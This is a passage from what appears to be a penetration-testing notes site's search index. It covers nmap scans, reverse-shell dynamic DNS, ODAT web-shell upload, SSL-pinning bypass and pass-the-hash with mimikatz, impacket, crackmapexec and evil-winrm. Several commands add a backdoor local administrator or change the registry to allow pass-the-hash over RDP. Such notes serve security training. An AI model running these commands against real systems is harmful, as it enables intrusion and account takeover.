                        As others have pointed out, scanning over a VPN link means you are limited to\u00a0internet-layer\u00a0interactions and operations. The \"V\" in VPN stands for Virtual, and means that you are not actually on the same link as the other hosts in your subnet, so you can't get information about their link-layer connections any more than they can know whether you've connected to the VPN via Starbucks WiFi, an Ethernet cable, or a dial-up modem.

                        You are further limited by the fact that Windows does not offer a general-purpose raw socket interface, so Nmap can't craft special packets at the network/internet layer. Usually we work around this by crafting Ethernet (link-layer) frames and injecting those with\u00a0Npcap, but VPN links do not use Ethernet frames, so that method doesn't work. We hope to be able to add this functionality in the future, but for now, VPNs are tricky to use with Npcap, and we haven't implemented PPTP or other VPN framing in Nmap to make it work. You can still do TCP Connect scanning (-sT), run most NSE scripts (-sC\u00a0or\u00a0--script), and do service version detection (-sV), but things like TCP SYN scan (-sS), UDP scanning (-sU), OS detection (-O), and traceroute (--traceroute) will not work.

                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#how-nmap-works","title":"How nmap works","text":"","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#ports","title":"Ports","text":"

                        Open port:

                        This indicates that the connection to the scanned port has been established. These connections can be TCP connections, UDP datagrams as well as SCTP associations.

                        Filtered port:

                        Nmap cannot correctly identify whether the scanned port is open or closed because either no response is returned from the target for the port or we get an error code from the target.

                        Closed port:

                        When the port is shown as closed, the TCP protocol indicates that the packet we received back contains an RST flag. This scanning method can also be used to determine if our target is alive or not.

                        Unfiltered port:

                        This state of a port only occurs during the TCP-ACK scan and means that the port is accessible, but it cannot be determined whether it is open or closed.

                        open|filtered port:

                        If we do not get a response for a specific port, Nmap will set it to that state. This indicates that a firewall or packet filter may protect the port.

                        closed|filtered port:

                        This state only occurs in the IP ID idle scans and indicates that it was impossible to determine if the scanned port is closed or filtered by a firewall.

                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#probes-for-host-discovery","title":"Probes for HOST discovery","text":"
                        TCP SYN probe (-PS <portlist>)\nTCP ACK probe (-PA <portlist>)\nUDP probe (-PU <portlist>)\nICMP Echo Request/Ping (-PE)\nICMP Timestamp Request (-PP)\nICMP Netmask Request (-PM)\n

                        List of the most filtered ports: 80, 25, 22, 443, 21, 113, 23, 53, 554, 3389, 1723. These are valuable ping ports.

                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#scans","title":"Scans","text":"","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#-ss-or-tcp-syn-scan","title":"-sS (or TCP SYN scan)","text":"

                        By default, Nmap scans the top 1000 TCP ports with the SYN scan (-sS). The SYN scan is the default only when we run Nmap as root, because of the socket permissions required to create raw TCP packets; otherwise, Nmap substitutes a TCP connect scan. Unprivileged users can only execute connect and FTP bounce scans.

                        • No connection established, but we got our response.
                        • Technique referred as half-open scanning, because you don't open a full TCP connection.
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#-st-or-tcp-connect-scan","title":"-sT (or TCP Connect scan)","text":"

                        TCP connect scan is the default TCP scan type when SYN scan is not an option (when not running with privileges). The Nmap TCP Connect Scan (-sT) uses the TCP three-way handshake to determine if a specific port on a target host is open or closed. The scan sends a SYN packet to the target port and waits for a response. The port is considered open if it responds with a SYN-ACK packet and closed if it responds with an RST packet.

                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#-sn-a-null-scan","title":"-sN (A NULL scan)","text":"

                        In the packet that nmap sends, the TCP flags header is set to 0 (no flags set).

                        If the response is:

                        • none: the port is open or filtered.
                        • RST: the port is closed.
                        • An ICMP unreachable response: the port is filtered.
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#-sa-ack-scan","title":"-sA (ACK scan)","text":"

                        Returns whether the port is filtered or not. It's useful to detect a firewall: filtered ports reveal the existence of some kind of firewall.

                        A variation of the TCP ACK scan is the TCP Windows scan.

                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#-sw-tcp-windows-scan","title":"-sW (TCP Windows scan)","text":"

                        It also sends an ACK packet. In the response, we pay attention to the window size of the TCP header:

                        • If the window size is different from 0, the port is open.
                        • If the window size is 0, the port is either closed or filtered.
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#how-to-identify-operating-system-using-ttl-value-and-ping-command","title":"How To Identify Operating System Using TTL Value And Ping Command","text":"

                        After running:

                        sudo nmap $ip -sn -oA host -PE --packet-trace --disable-arp-ping \n

                        We can get:

                        Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-15 00:12 CEST\nSENT (0.0107s) ICMP [10.10.14.2 > 10.129.2.18 Echo request (type=8/code=0) id=13607 seq=0] IP [ttl=255 id=23541 iplen=28 ]\nRCVD (0.0152s) ICMP [10.129.2.18 > 10.10.14.2 Echo reply (type=0/code=0) id=13607 seq=0] IP [ttl=128 id=40622 iplen=28 ]\nNmap scan report for 10.129.2.18\nHost is up (0.086s latency).\nMAC Address: DE:AD:00:00:BE:EF\nNmap done: 1 IP address (1 host up) scanned in 0.11 seconds\n

                        You can quickly detect whether a system is running Linux, Windows, or another OS by looking at the TTL value in the output of the ping command; no extra applications are needed. The default initial TTL value for Linux/Unix is 64, while for Windows it is 128.
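
                        For example (output abbreviated and illustrative; intermediate hops may lower the observed TTL):

                        ping -c 1 $ip\n# 64 bytes from $ip: icmp_seq=1 ttl=128 time=0.52 ms   -> initial TTL 128: likely Windows\n# a ttl around 64 would instead suggest Linux/Unix\n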

                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#saving-the-results","title":"Saving the results","text":"
                        -oN: Normal output with .nmap file extension\n-oG: Grepable output with the .gnmap file extension\n-oX: XML output  with the .xml file extension\n-oA: Save results in all formats\n

                        With the XML output, we can easily create HTML reports. To convert the stored results from XML format to HTML, we can use the tool xsltproc.

                        xsltproc target.xml -o target.html\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#quick-techniques","title":"Quick techniques","text":"","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#host-enumeration-determining-if-host-is-alive-with-arp-ping","title":"Host Enumeration: Determining if host is alive with ARP ping","text":"

                        It can be done with --packet-trace or with --reason.

                        sudo nmap <IP> -sn -oA host -PE --packet-trace\n# -sn   Disables port scanning.\n# -oA host  Stores the results in all formats starting with the name 'host'.\n# -PE   Performs the ping scan by using 'ICMP Echo requests' against the target.\n# --packet-trace    Shows all packets sent and received\n
                        sudo nmap <IP> -sn -oA host -PE --reason\n# -sn   Disables port scanning.\n# -oA host  Stores the results in all formats starting with the name 'host'.\n# -PE   Performs the ping scan by using 'ICMP Echo requests' against the target.\n# --reason  Displays the reason for specific result.\n

                        To disable ARP requests and scan our target with the desired ICMP echo requests, we can disable ARP pings by setting the \"--disable-arp-ping\" option.

                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#port-scanning-having-a-clear-view-of-a-syn-scan-on-a-port","title":"Port scanning: having a clear view of a SYN scan on a port","text":"

                        To have a clear view of the SYN scan on port 21, disable the ICMP echo requests (-Pn), DNS resolution (-n), and ARP ping scan (--disable-arp-ping).

                        sudo nmap <IP> -p 21 --packet-trace -Pn -n --disable-arp-ping\n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"nmap/#performing-a-ftp-bounce-attack","title":"Performing a FTP bounce attack","text":"

                        An FTP bounce attack is a network attack that uses FTP servers to deliver outbound traffic to another device on the network. For instance, consider that we are targeting an FTP server FTP_DMZ exposed to the internet. Another device within the same network, Internal_DMZ, is not exposed to the internet. We can use the connection to the FTP_DMZ server to scan Internal_DMZ using the FTP bounce attack and obtain information about the server's open ports.

                        nmap -Pn -v -n -p80 -b anonymous:password@$ipFTPdmz $ipINTERNALdmz\n# -b The\u00a0`Nmap`\u00a0-b flag can be used to perform an FTP bounce attack: \n
                        ","tags":["reconnaissance","scanning","active recon","passiverecon"]},{"location":"noip/","title":"noip","text":"

                        When coding a reverse shell, you don't need to hardcode the IP address of the attacker machine. Instead, you can use a dynamic DNS service such as https://www.noip.com/. To keep this service informed of our attacker machine's public IP address, we install the Linux Dynamic Update Client on our Kali machine (an agent that does the trick).

                        ","tags":["pentesting","python"]},{"location":"noip/#install-dynamic-update-client-on-linux","title":"Install Dynamic Update Client on Linux","text":"

                        As root user:

                        cd /usr/local/src/\nwget http://www.noip.com/client/linux/noip-duc-linux.tar.gz\ntar xf noip-duc-linux.tar.gz\ncd noip-2.1.9-1/\nmake install\n
                        ","tags":["pentesting","python"]},{"location":"nslookup/","title":"nslookup","text":"

                        With Nslookup, we can search for domain name servers on the Internet and ask them for information about hosts and domains.

                        # Query `A` records by submitting a domain name: default behaviour\nnslookup $TARGET\n\n# We can use the `-query` parameter to search specific resource records\n# Querying: A Records for a Subdomain\nnslookup -query=A $TARGET\n\n# Querying: PTR Records for an IP Address\nnslookup -query=PTR 31.13.92.36\n\n# Querying: ANY Existing Records\nnslookup -query=ANY $TARGET\n\n# Querying: TXT Records\nnslookup -query=TXT $TARGET\n\n# Querying: MX Records\nnslookup -query=MX $TARGET\n\n#  Specify a nameserver if needed by adding `@<nameserver/IP>` to the command\n

                        References: - nslookup (https://linux.die.net/man/1/nslookup)

                        ","tags":["pentesting","dns","enumeration","tools"]},{"location":"nt-authority-system/","title":"NT Authority System","text":"

                        The LocalSystem account NT AUTHORITY\SYSTEM is a built-in account in Windows operating systems, used by the service control manager. It has the highest level of access in the OS (and can be made even more powerful with Trusted Installer privileges). This account has more privileges than a local administrator account and is used to run most Windows services. It is also very common for third-party services to run in the context of this account by default. The SYSTEM account has the following privileges:

                        SE_ASSIGNPRIMARYTOKEN_NAME, SE_AUDIT_NAME, SE_BACKUP_NAME, SE_CHANGE_NOTIFY_NAME, SE_CREATE_GLOBAL_NAME, SE_CREATE_PAGEFILE_NAME, SE_CREATE_PERMANENT_NAME, SE_CREATE_TOKEN_NAME, SE_DEBUG_NAME, SE_IMPERSONATE_NAME, SE_INC_BASE_PRIORITY_NAME, SE_INCREASE_QUOTA_NAME, SE_LOAD_DRIVER_NAME, SE_LOCK_MEMORY_NAME, SE_MANAGE_VOLUME_NAME, SE_PROF_SINGLE_PROCESS_NAME, SE_RESTORE_NAME, SE_SECURITY_NAME, SE_SHUTDOWN_NAME, SE_SYSTEM_ENVIRONMENT_NAME, SE_SYSTEMTIME_NAME, SE_TAKE_OWNERSHIP_NAME, SE_TCB_NAME, SE_UNDOCK_NAME
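
                        On a Windows host, the privileges held by the current token can be listed with:

                        whoami /priv\n# Look for entries such as SeDebugPrivilege or SeImpersonatePrivilege\n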

                        The SYSTEM account on a domain-joined host can enumerate Active Directory by impersonating the computer account, which is essentially a special user account. If you land on a domain-joined host with SYSTEM privileges during an assessment and cannot find any useful credentials in memory or other data on the machine, there are still many things you can do. Having SYSTEM-level access within a domain environment is nearly equivalent to having a domain user account. The only real limitation is not being able to perform cross-trust Kerberos attacks such as Kerberoasting.

                        There are several ways to gain SYSTEM-level access on a host, including but not limited to:

                        • Remote Windows exploits such as EternalBlue or BlueKeep.
                        • Abusing a service running in the context of the SYSTEM account.
                        • Abusing SeImpersonate privileges using RottenPotatoNG against older Windows systems, Juicy Potato, or PrintSpoofer if targeting Windows 10/Windows Server 2019.
                        • Local privilege escalation flaws in Windows operating systems such as the Windows 10 Task Scheduler 0day.
                        • PsExec with the -s flag (see the example below)
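                        For instance, with Sysinternals PsExec from an elevated prompt (a minimal sketch):

                        # Spawn an interactive shell running as SYSTEM\nPsExec.exe -i -s cmd.exe\n\n# Then, inside the new shell:\nwhoami\n# nt authority\\system\n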
                        ","tags":["active directory","ldap","windows"]},{"location":"objection/","title":"Objection","text":"

                        What does it do? It makes a regular ADB connection and starts the Frida server on the device. If you are using a rooted device, you need to select the application you want to test with the --gadget option.

                        ","tags":["mobile pentesting"]},{"location":"objection/#installation","title":"Installation","text":"
                        pip3 install objection\n
                        ","tags":["mobile pentesting"]},{"location":"objection/#usage","title":"Usage","text":"

                        Start objection against the application you want to test by passing its package name to the --gadget option (required on a rooted device).

                        In the metromadrid app, this would be:

                        objection --gadget es.metromadrid.metroandroid explore\n
                        ","tags":["mobile pentesting"]},{"location":"objection/#basic-commands","title":"Basic commands","text":"
                        # Some interesting information (like passwords, paths...) could be found inside the environment.\nenv\n\nfile download <remotepath> [<localpath>]\nfile upload <localpath> [<remotepath>]\nimport <localpath frida-script>\n\n# Disable SSL pinning on android devices\nandroid sslpinningdisable\n
                        ","tags":["mobile pentesting"]},{"location":"oci-fundamentals-preparation/","title":"Notes","text":"

                        OCI has more than 80 services.

                        Instead of regions and availability zones, in Oracle we have Regions and Availability Domains; at the next level, instead of datacenters, we have Fault Domains.


                        "},{"location":"odat/","title":"odat - Oracle Database Attacking Tool","text":"

                        Oracle Database Attacking Tool (ODAT) is an open-source penetration testing tool written in Python and designed to enumerate and exploit vulnerabilities in Oracle databases. It can be used to identify and exploit various security flaws in Oracle databases, including SQL injection, remote code execution, and privilege escalation.

                        ","tags":["enumeration","snmp","port 161","tools"]},{"location":"odat/#installation","title":"Installation","text":"

                        This script installs the needed packages and tools:

                        #!/bin/bash\n\nsudo apt-get install libaio1 python3-dev alien python3-pip -y\ngit clone https://github.com/quentinhardy/odat.git\ncd odat/\ngit submodule init\ngit submodule update\nsudo apt install oracle-instantclient-basic oracle-instantclient-devel oracle-instantclient-sqlplus -y\npip3 install cx_Oracle\nsudo apt-get install python3-scapy -y\nsudo pip3 install colorlog termcolor pycryptodome passlib python-libnmap\nsudo pip3 install argcomplete && sudo activate-global-python-argcomplete\n

                        Check installation with:

                        ./odat.py -h\n
                        ","tags":["enumeration","snmp","port 161","tools"]},{"location":"odat/#basic-usage","title":"Basic usage","text":"

                        We can use odat.py from the ODAT tool to retrieve database names, versions, running processes, user accounts, vulnerabilities, misconfigurations, etc.

                        ./odat.py all -s $ip\n

                        Upload a web shell to the target:

                        # Upload a web shell to the target. This requires the server to run a web server, and we need to know the exact location of the root directory for the webserver.\n\n## 1. Creating a non suspicious web shell \necho \"Oracle File Upload Test\" > testing.txt\n\n## 2. Uploading the shell to linux (/var/www/html) or windows (C:\\\\inetpub\\\\wwwroot):\n./odat.py utlfile -s $ip -d XE -U <user> -P <password> --sysdba --putFile C:\\\\inetpub\\\\wwwroot testing.txt ./testing.txt\n\n## 3. Test if the file upload approach worked with curl, or visit via browser.\ncurl -X GET http://$ip/testing.txt\n
                        ","tags":["enumeration","snmp","port 161","tools"]},{"location":"odata-pentesting/","title":"Pentesting oData","text":"

                        The Open Data Protocol (OData) is an open web protocol for querying and updating data. OData enables the creation of HTTP-based RESTful data services that can be used to publish and edit resources identified by uniform resource identifiers (URIs) using simple HTTP messages.

                        ","tags":["oData","pentesting","webpentesting","Dynamics"]},{"location":"odata-pentesting/#the-service-metadata-document","title":"The Service Metadata Document","text":"

                        It usually has this syntax:

                        http://localhost:32026/OData/OData.svc/$metadata\n

                        https://infosecwriteups.com/unauthorized-access-to-odata-entities-2k-bounty-from-microsoft-e070b2ef88c2

                        The OData metadata is a data model of the system (consider it as information_schema in relational databases). For each metadata document we have entities (similar to tables in relational databases) and properties (similar to columns), as well as the relationships between different entity types. Each entity type has an entity key, similar to the key in relational databases.
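
                        Once entity sets are known from the metadata, they can be queried with plain HTTP. A hypothetical example (the host, port, and the Products entity set are illustrative, not from the original service):

                        # List the first two entities of a set\ncurl 'http://localhost:32026/OData/OData.svc/Products?$top=2'\n\n# Retrieve a single entity by its key\ncurl 'http://localhost:32026/OData/OData.svc/Products(1)'\n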
                        ","tags":["oData","pentesting","webpentesting","Dynamics"]},{"location":"onesixtyone/","title":"onesixtyone - Fast and simple SNMP scanner","text":"

                        See SNMP for details about the protocol.

                        ","tags":["enumeration","snmp","port 161","tools"]},{"location":"onesixtyone/#installation","title":"Installation","text":"

                        Download from github repo: https://github.com/trailofbits/onesixtyone.

                        sudo apt install onesixtyone\n
                        ","tags":["enumeration","snmp","port 161","tools"]},{"location":"onesixtyone/#basic-usage","title":"Basic usage","text":"
                        onesixtyone -c /opt/useful/SecLists/Discovery/SNMP/snmp.txt $ip\n
                        ","tags":["enumeration","snmp","port 161","tools"]},{"location":"openssl/","title":"openSSL - Cryptography and SSL/TLS Toolkit","text":"

                        openSSL Website.

                        ","tags":["openssl"]},{"location":"openssl/#basic-usage","title":"Basic usage","text":"
                        openssl s_client -connect target.site:443\nHEAD / HTTP/1.0\n
                        • Create self signed certificates.
                        • Encrypt/Decrypt files.
                        • Generate private/public keys.
                        • Encrypt/Decrypt files with public/private keys.
                        # Pwnbox - Create a Self-Signed Certificate\nopenssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'\n\n# Encrypt a file\nopenssl enc -aes-256-cbc -iter 100000 -pbkdf2 -in sourceFile.txt -out outputFile.txt.enc\n# -iter 100000: Optional. Override the default iteration count with this option.\n# -pbkdf2: Optional. Use the Password-Based Key Derivation Function 2 algorithm.\n\n# Decrypt a file\nopenssl enc -d -aes-256-cbc -iter 100000 -pbkdf2 -in encryptedFile.enc -out outputFile.txt\n\n# Generate private key\nopenssl genrsa -aes256 -out private.pem 2048\n\n# Generate public key\nopenssl rsa -in private.pem -outform PEM -pubout -out public.pem\n\n# Encrypt a file with public key\nopenssl rsautl -encrypt -inkey public.pem -pubin -in file.txt -out file.enc\n# -pubin: the input key is a public key\n\n# Decrypt a file with private key\nopenssl rsautl -decrypt -inkey private.pem -in file.enc -out file.txt\n
                        ","tags":["openssl"]},{"location":"openvas/","title":"OpenVAS","text":"

                        OpenVAS by Greenbone Networks is a publicly available open-source vulnerability scanner. OpenVAS can perform network scans, including authenticated and unauthenticated testing.

                        Scans may take 1-2 hours to finish.

                        ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"openvas/#installation","title":"Installation","text":"
                        # Updating packages\nsudo apt-get update && apt-get -y full-upgrade\n\n# Install the tool\nsudo apt-get install gvm && openvas\n\n# Initiate setup process\nsudo gvm-setup\n\n\n# Check installation\nsudo gvm-check-setup\n\n\n\n# Start OpenVAS\nsudo gvm-start\n

                        OpenVAS stands for Open Vulnerability Assessment Scanner. It's based on assets (not on scans): these assets may be hosts, operating systems, TLS certificates... Scans are here called Tasks.

                        ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"openvas/#basic-usage","title":"Basic usage","text":"
                        # Start OpenVAS\nsudo gvm-start\n

                        Go to https://$ip:8080

                        Documentation.

                        • Base: This scan configuration is meant to enumerate information about the host's status and operating system information.
                        • Discovery: Enumerate host's services, hardware, accessible ports, and software being used on the system.
                        • Host Discovery: Determines whether the host is alive and what devices are active on the network. OpenVAS leverages ping to identify if the host is alive.
                        • System Discovery: Enumerates the target host further than the 'Discovery Scan' and attempts to identify the operating system and hardware associated with the host.
                        • Full and fast: This configuration is recommended by OpenVAS as the safest option and leverages intelligence to use the best NVT checks for the host(s) based on the accessible ports.

                        There are various export formats for reporting purposes, including XML, CSV, PDF, ITG, and TXT. If you choose to export your report as XML, you can leverage various XML parsers to view the data in an easier-to-read format.

                        ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"openvas/#reporting","title":"Reporting","text":"

                        See openVAS Reporting.

                        ","tags":["reconnaissance","scanner","vulnerability assessment"]},{"location":"openvasreporting/","title":"openVAS Reporting","text":"","tags":["reconnaissance","scanner","vulnerability assessment","reporting"]},{"location":"openvasreporting/#installation","title":"Installation","text":"

                        Download from github repo: https://github.com/TheGroundZero/openvasreporting.

                        # Install Python3 and pip3 before.\n\n# Clone git repository\ngit clone https://github.com/TheGroundZero/openvasreporting.git\n\n# Install required python packages\ncd openvasreporting\npip3 install pip --upgrade\npip3 install build --upgrade\npython -m build\n\n# Install module\npip3 install dist/OpenVAS_Reporting-X.x.x-py3-xxxx-xxx.whl\n

                        Alternative with pip3

                        # Install Python3 and pip3\napt(-get) install python3 python3-pip # Debian\n\n# Install the package\npip3 install OpenVAS-Reporting\n
                        ","tags":["reconnaissance","scanner","vulnerability assessment","reporting"]},{"location":"openvasreporting/#basic-usage","title":"Basic usage","text":"
                        python3 -m openvasreporting -i report-2bf466b5-627d-4659-bea6-1758b43235b1.xml -f xlsx\n
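Several report files can also be merged into a single spreadsheet, and findings can be filtered by minimal severity. A sketch assuming the -l flag (levels c/h/m/l/n) as documented in the repo; verify with --help:

python3 -m openvasreporting -i report-*.xml -f xlsx -l h\n# -i accepts several XML files, merged into one report\n# -l h: assumed flag to keep only findings of severity high and above\n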
                        ","tags":["reconnaissance","scanner","vulnerability assessment","reporting"]},{"location":"operating-systems/","title":"Repo for legacy Operating system","text":"","tags":["resources"]},{"location":"operating-systems/#old-version-of-windows","title":"Old version of Windows","text":"

                        From Windows 1.0 DR 5 to nowadays ISOs: https://osvault.weebly.com/windows-beta-repository.html

                        ","tags":["resources"]},{"location":"operating-systems/#windows-servers","title":"Windows servers","text":"","tags":["resources"]},{"location":"operating-systems/#-windows-server-2019-httpswwwmicrosoftcomes-esevalcenterdownload-windows-server-2019","title":"- Windows Server 2019: https://www.microsoft.com/es-es/evalcenter/download-windows-server-2019.","text":"","tags":["resources"]},{"location":"ophcrack/","title":"ophcrack - A windows password cracker based on rainbow tables","text":"

                        Ophcrack is a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. It comes with a Graphical User Interface and runs on multiple platforms.

                        ","tags":["pentesting","password cracker"]},{"location":"ophcrack/#installation","title":"Installation","text":"

                        Download from https://ophcrack.sourceforge.io/.

                        ","tags":["pentesting","password cracker"]},{"location":"owasp-zap/","title":"OWASP zap","text":"

                        To launch it, run:

                        zaproxy\n

                        You can do several things:

                        • Run an automatic attack.
                        • Import your spec.yml file and run an automatic attack.
                        • Run a manual attack.

                        The manual explore option will allow you to perform authenticated scanning. Set the URL to your target, make sure the HUD is enabled, and choose \"Launch Browser\".

                        "},{"location":"owasp-zap/#how-to-run-a-manual-attack","title":"How to run a manual attack","text":"

                        Select \"Continue to your target\". On the right-hand side of the HUD, you can set the Attack Mode to On. This will begin scanning and performing authenticated testing of the target. Now you perform all the actions (sign up a new user, log in into the account, modify you avatar, post a comment...).

                        After that, OWASP ZAP allows you to narrow the results to your target. How? In the Sites module, right-click on your site and select \"Include in context\". Then click on the target-shaped icon to filter sites by context.

                        With the results, start your analysis and weed out false positives.

                        "},{"location":"owasp-zap/#interesting-addons","title":"Interesting addons","text":"

                        Update all your addons when opening ZAP for the first time.

                        • Treetools
                        • Reflect
                        • Revisit
                        • Directory List v.2.3
                        • Wappalyzer
                        • Python Scripting
                        • Passive scanner rules
                        • FileUpload
                        • Regular Expression tester.
                        "},{"location":"p0f/","title":"P0f","text":"

                        P0f is a tool that utilizes an array of sophisticated, purely passive traffic fingerprinting mechanisms to identify the players behind any incidental TCP/IP communications (often as little as a single normal SYN) without interfering in any way. Version 3 is a complete rewrite of the original codebase, incorporating a significant number of improvements to network-level fingerprinting, and introducing the ability to reason about application-level payloads (e.g., HTTP).

                        ","tags":["scanning","tcp","reconnaissance","passive reconnaissance"]},{"location":"p0f/#installation","title":"Installation","text":"

                        Download from: https://lcamtuf.coredump.cx/p0f3/.

                        ","tags":["scanning","tcp","reconnaissance","passive reconnaissance"]},{"location":"p0f/#_1","title":"p0f","text":"","tags":["scanning","tcp","reconnaissance","passive reconnaissance"]},{"location":"pass-the-hash/","title":"Pass The Hash","text":"

                        With NTLM, passwords stored on the server and domain controller are not \"salted,\" which means that an adversary with a password hash can authenticate a session without knowing the original password. A Pass the Hash (PtH) attack is a technique where an attacker uses a password hash instead of the plain text password for authentication.

                        ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-mimikatz-windows","title":"Pass the Hash with Mimikatz (Windows)","text":"

                        see mimikatz

                        # Pass The Hash attack in windows:\n# 1. Run mimikatz\nmimikatz.exe privilege::debug \"sekurlsa::pth /user:<username> /rc4:<NTLM hash> /domain:<DOMAIN> /run:<Command>\" exit\n# sekurlsa::pth is a module that allows us to perform a Pass the Hash attack by starting a process using the hash of the user's password\n# /run:<Command>: For example /run:cmd.exe\n# 2. After that, we can use cmd.exe to execute commands in the user's context. \n
                        ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-powershell-invoke-thehash-windows","title":"Pass the Hash with PowerShell Invoke-TheHash (Windows)","text":"

                        See Powershell Invoke-TheHash. This tool is a collection of PowerShell functions for performing Pass the Hash attacks with WMI and SMB. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privileges are not required client-side, but the user and hash we use to authenticate need to have administrative rights on the target computer.

                        When using Invoke-TheHash, we have two options: SMB or WMI command execution.

                        cd C:\\tools\\Invoke-TheHash\\\n\nImport-Module .\\Invoke-TheHash.psd1\n
                        ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#invoke-thehash-with-smb","title":"Invoke-TheHash with SMB","text":"
                        Invoke-SMBExec -Target $ip -Domain <DOMAIN> -Username <USERNAME> -Hash 64F12CDDAA88057E06A81B54E73B949B -Command \"net user mark Password123 /add && net localgroup administrators mark /add\" -Verbose\n# Command to execute on the target. If a command is not specified, the function will check whether the username and hash have access on the target.\n# We can also use `Invoke-TheHash` to execute a PowerShell reverse shell script on the target computer.\n

                        How to generate a reverse shell.

                        ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#invoke-thehash-with-wmi","title":"Invoke-TheHash with WMI","text":"
                        Invoke-WMIExec -Target $machineName -Domain <DOMAIN> -Username <USERNAME> -Hash 64F12CDDAA88057E06A81B54E73B949B -Command  \"net user mark Password123 /add && net localgroup administrators mark /add\" \n

                        How to generate a reverse shell.

                        ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-impacket-linux","title":"Pass the Hash with Impacket (Linux)","text":"","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-impacket-psexec","title":"Pass the Hash with Impacket PsExec","text":"
                        impacket-psexec <username>@$ip -hashes :30B3783CE2ABF1AF70F77D0660CF3453\n
                        ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-impacket-wmiexec","title":"Pass the Hash with impacket-wmiexec","text":"

                        Download from: https://github.com/fortra/impacket/blob/master/examples/wmiexec.py.
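A usage sketch, following the same LM:NT hash convention as psexec above (the LM half can be left empty):

impacket-wmiexec <username>@$ip -hashes :30B3783CE2ABF1AF70F77D0660CF3453\n# Gives a semi-interactive shell over WMI/DCOM, without creating a service like psexec does\n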

                        ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-impacket-atexec","title":"Pass the Hash with impacket-atexec","text":"

                        Download from: https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py

                        ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-impacket-smbexec","title":"Pass the Hash with impacket-smbexec","text":"

                        Download from: https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py
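Both follow the same syntax as psexec; atexec additionally takes the command to run as an argument, since it executes through a scheduled task. A sketch:

impacket-smbexec <username>@$ip -hashes :30B3783CE2ABF1AF70F77D0660CF3453\nimpacket-atexec <username>@$ip -hashes :30B3783CE2ABF1AF70F77D0660CF3453 whoami\n# atexec runs a single command via the Task Scheduler service and prints its output\n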

                        ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-crackmapexec-linux","title":"Pass the Hash with CrackMapExec (Linux)","text":"

                        See CrackMapExec

                        # Using a hash instead of a password, to authenticate ourselves\ncrackmapexec smb $ip -u <username> -H <hash> -d <DOMAIN>\n\n# Execute commands with flag -x\ncrackmapexec smb $ip/24 -u <Administrator> -d . -H <hash> -x whoami\n
                        ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-evil-winrm-linux","title":"Pass the Hash with evil-winrm (Linux)","text":"

                        See evil-winrm.

                        If SMB is blocked or we don't have administrative rights, we can use this alternative protocol to connect to the target machine.

                        evil-winrm -i $ip -u <username> -H <hash>\n
                        ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#pass-the-hash-with-rdp-linux","title":"Pass the Hash with RDP (Linux)","text":"
                        xfreerdp [/d:domain] /u:<username> /pth:<hash> /v:$ip\n# /pth:<hash>   Pass the hash\n

                        Restricted Admin Mode, which is disabled by default, should be enabled on the target host; otherwise, you will be presented with an error. This can be enabled by adding a new registry key DisableRestrictedAdmin (REG_DWORD) under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa with the value of 0. It can be done using the following command:

                        reg add HKLM\\System\\CurrentControlSet\\Control\\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f\n

                        Once the registry key is added, we can use xfreerdp with the option /pth to gain RDP access.
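A complete invocation might look like the sketch below; /cert:ignore skips validation of the (usually self-signed) RDP certificate on lab targets:

xfreerdp /v:$ip /u:<username> /pth:<hash> /cert:ignore\n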

                        ","tags":["privilege escalation","windows"]},{"location":"pass-the-hash/#uac-limits-pass-the-hash-for-local-accounts","title":"UAC Limits Pass the Hash for Local Accounts","text":"

                        UAC (User Account Control) limits local users' ability to perform remote administration operations. When the registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy is set to 0, it means that the built-in local admin account (RID-500, \"Administrator\") is the only local account allowed to perform remote administration tasks. Setting it to 1 allows the other local admins as well.

                        Note: There is one exception: if the registry key FilterAdministratorToken (disabled by default) is enabled (value 1), the RID-500 account (even if it is renamed) is enrolled in UAC protection. This means that remote PtH will fail against the machine when using that account.

